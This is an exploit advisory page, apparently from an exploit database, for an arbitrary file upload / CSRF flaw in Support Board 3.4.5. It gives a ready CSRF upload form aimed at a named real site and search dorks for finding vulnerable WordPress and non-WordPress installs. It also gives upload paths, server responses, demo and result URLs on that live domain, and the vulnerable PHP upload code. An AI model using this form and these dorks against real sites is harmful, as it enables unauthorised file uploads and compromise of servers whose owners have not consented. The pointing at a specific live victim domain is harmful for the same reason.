Support Board 3.4.5 WP and NonWP Arbitrary File Upload / CSRF File Upload

2022.03.01
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Title: Support Board 3.4.5 Arbitrary File Upload / CSRF File Upload Author: L4663r666h05t Twitter: https://twitter.com/L4663r666h05t Vendor Homepage: N/A Postfile: file CSRF Code: <form action="https://www.support.angohost.ao/supportboard/include/upload.php" method="post" target="_blank"> <input type="file" name="file"> <input type="submit" name="kill" value=">>"> </form> On Non-WP: /supportboard/include/upload.php Dork For Non-WP: supportboard/uploads/ On WP: /wp-content/plugins/supportboard/supportboard/include/upload.php Dork for WP: /wp-content/plugins/supportboard/supportboard/uploads/ Path file: /supportboard/uploads/(tanggal)/randomname_namafile.jpg /~path/uploads/(tanggal)/randomname_namafile.jpg If vulnerable, upload.php will show this: ["error","Support Board Error: Key file in $_FILES not found."] Demo: https://www.support.angohost.ao/supportboard/include/upload.php Result: https://www.support.angohost.ao/supportboard/uploads/01-03-22/69927_0x.jpg Success upload will show text like: ["success","SB_URL\/uploads\/(timestamp)\/(random)_(your file name).jpg"] vuln code on upload.php: $allowed_extensions = array('json','psd','ai','jpg','jpeg','png','gif','pdf','doc','docx','key','ppt','odt','xls','xlsx','zip','rar','mp3','m4a','ogg','wav','mp4','mov','wmv','avi','mpg','ogv','3gp','3g2','mkv','txt','ico','csv','ttf','font','css','scss'); if (isset($_FILES['file'])) { if (0 < $_FILES['file']['error']) { die(json_encode(array('error', 'Support Board: Error into upload.php file.'))); } else { $file_name = sb_upload_escape($_FILES['file']['name']); $infos = pathinfo($file_name); $directory_date = date('d-m-y'); $path = '../uploads/' . $directory_date; $url = SB_URL . '/uploads/' . $directory_date; if (isset($infos['extension']) && in_array(strtolower($infos['extension']), $allowed_extensions)) { if (defined('SB_UPLOAD_PATH') && SB_UPLOAD_PATH != '' && defined('SB_UPLOAD_URL') && SB_UPLOAD_URL != '') { $path = SB_UPLOAD_PATH . '/' . $directory_date; $url = SB_UPLOAD_URL . '/' . $directory_date; }


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top